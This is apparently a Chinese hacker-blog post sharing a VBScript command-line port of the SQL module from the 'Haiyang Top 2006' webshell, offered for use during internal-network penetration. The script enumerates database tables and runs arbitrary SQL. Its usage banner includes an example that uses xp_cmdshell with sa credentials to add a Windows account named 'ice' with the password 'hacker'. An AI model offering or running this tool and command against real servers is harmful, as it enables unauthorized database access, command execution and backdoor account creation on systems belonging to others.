花了一点时间把以前的海阳顶端2006的sql模块改成vbs版了,和它的功能是一模一样的,不过用起来可能没有asp版的舒服,不过能用,可以用在dos下了,渗透内网时估计你用得着。
if (lcase(right(wscript.fullname,11))="wscript.exe") then
echo "execute it under the cmd.exe plz! thx."
echo "code by lcx"
wscript.quit
end if
if wscript.arguments.count<1 then
echo "usage: cscript sql.vbs showtables e:\hytop.mdb或sql:provider=sqloledb.1;server=localhost;user id=sa;password=haiyangtop;database=bbs;"
echo "usage: cscript sql.vbs query 连接字符串 <表名=default:""""> sql语句 <页数=default:1>"
echo "exp:cscript sql.vbs showtables "&chr(34)&"sql:provider=sqloledb.1;server=localhost;user id=sa;password=haiyangtop;database=bbs"&chr(34)
echo "exp:cscript sql.vbs query "&chr(34)&"sql:provider=sqloledb.1;server=localhost;user id=sa;password=haiyangtop;database=bbs"&chr(34)&space(1) &chr(34)&chr(34)&space(1)&chr(34)&"select * from name"&chr(34)&space(1) & 1
echo "exp:cscript sql.vbs query "&chr(34)&"sql:provider=sqloledb.1;server=localhost;user id=sa;password=haiyangtop;database=bbs"&chr(34)&space(1) &chr(34)&chr(34)&space(1)&chr(34)&"update....."&chr(34)&space(1) & 1
echo "exp:cscript sql.vbs query "&chr(34)&"sql:provider=sqloledb.1;server=localhost;user id=sa;password=haiyangtop;database=bbs"&chr(34)&space(1) &chr(34)&chr(34)&space(1)&chr(34)&"exec master.dbo.xp_cmdshell 'net user ice hacker /add'--"&chr(34)&space(1) & 1
end if
sub chkerr(err)
if err then
echo "错误: " & err.description & "错误源: " & err.source & vbcrlf
err.clear
wscript.quit
end if
end sub
sub echo(str)
wscript.echo str
end sub
function fixnull(str)
if isnull(str) then
str = " "
end if
fixnull = str
end function
sub showerr(str)
dim i, arraystr
arraystr = split(str, "$$")
echo "出错信息:"&vbcrlf
for i = 0 to ubound(arraystr)
echo (i + 1) & ". " & arraystr(i) & "<br/>"
next
echo vbcrlf
wscript.quit
end sub
rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
rem 下面是程序模块选择部分
rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
pagemsdatabase()
sub pagemsdatabase()
dim theact, sqlstr
theact = wscript.arguments(0)
sqlstr = wscript.arguments(1)
select case theact
case "showtables"
showtables()
case "query"
showquery()
end select
end sub
sub showtables()
dim conn, sqlstr, rstable, rscolumn, connstr, tablesstr
sqlstr = wscript.arguments(1)
if lcase(left(sqlstr, 4)) = "sql:" then
connstr = mid(sqlstr, 5)
else
connstr = "provider=microsoft.jet.oledb.4.0;data source=" & sqlstr
end if
set conn = createobject("adodb.connection")
conn.open connstr
chkerr(err)
tablesstr = gettablelist(conn, sqlstr, rstable)
echo tablesstr & "================================================="
do until rstable.eof
set rscolumn = conn.openschema(4, array(empty, empty, rstable("table_name").value))
echo rstable("table_name") &vbcrlf
do until rscolumn.eof
echo "字段名:" & rscolumn("column_name")&vbclrf
echo "类型:" & getdatatype(rscolumn("data_type")) & vbclrf
echo "大小:" & rscolumn("character_maximum_length") & vbclrf
echo "精度:" & rscolumn("numeric_precision") & vbclrf
echo "允许为空:" & rscolumn("is_nullable") & vbclrf
echo "默认值:" & rscolumn("column_default") & vbclrf&vbclrf
rscolumn.movenext
loop
rstable.movenext
echo vbcrlf
loop
echo "==============================================================="
conn.close
set conn = nothing
set rstable = nothing
set rscolumn = nothing
end sub
sub showquery()
dim i, j, rs, sql, page, conn, sqlstr, connstr, rstable, tablesstr, thetable
sqlstr = wscript.arguments(1)
thetable = wscript.arguments(2)
sql=wscript.arguments(3)
page=wscript.arguments(4)
if not isnumeric(page) or page = "" then
page = 1
end if
if lcase(left(sqlstr, 4)) = "sql:" then
connstr = mid(sqlstr, 5)
else
connstr = "provider=microsoft.jet.oledb.4.0;data source=" & sqlstr
end if
set rs = createobject("adodb.recordset")
set conn = createobject("adodb.connection")
conn.open connstr
chkerr(err)
tablesstr = gettablelist(conn, sqlstr, rstable)
echo "数据库表结构查看:"
echo tablesstr & "========================================================"
echo ">sql命令执行及查看<:"&vbcrlf
if sql <> "" and left(lcase(sql), 7) = "select " then
rs.open sql, conn, 1, 1
chkerr(err)
rs.pagesize = 20
if not rs.eof then
rs.absolutepage = page
end if
if rs.fields.count>0 then
echo "sql操作 - 执行结果"&vbcrlf
echo "===================="&thetable&"列名如下========================================"
for j = 0 to rs.fields.count-1
echo rs.fields(j).name & vbcrlf
next
for i = 1 to 20
if rs.eof then
exit for
end if
for j = 0 to rs.fields.count-1
echo fixnull(rs(j))& vbcrlf
next
rs.movenext
next
end if
echo "================================================================="
echo " 共有"&rs.fields.count&"列" & vbcrlf
for i = 1 to rs.pagecount
page=i
next
echo " 共有" & page & "页"
rs.close
else
if sql <> "" then
conn.execute(sql)
chkerr(err)
echo "执行完毕!"&vbcrlf
end if
end if
conn.close
set rs = nothing
set conn = nothing
set rstable = nothing
end sub
function getdatatype(typeid)
select case typeid
case 130
getdatatype = "文本"
case 2
getdatatype = "整型"
case 3
getdatatype = "长整型"
case 7
getdatatype = "日期/时间"
case 5
getdatatype = "双精度型"
case 11
getdatatype = "是/否"
case 128
getdatatype = "ole 对象"
case else
getdatatype = typeid
end select
end function
function gettablelist(conn, sqlstr, rstable)
set rstable = conn.openschema(20, array(empty, empty, empty, "table"))
echo "存在以下表名:"
do until rstable.eof
gettablelist = gettablelist & "["& rstable("table_name") & "]"&vbcrlf
rstable.movenext
loop
rstable.movefirst
end function
如对本文有疑问,
点击进行留言回复!!
我要评论
网友评论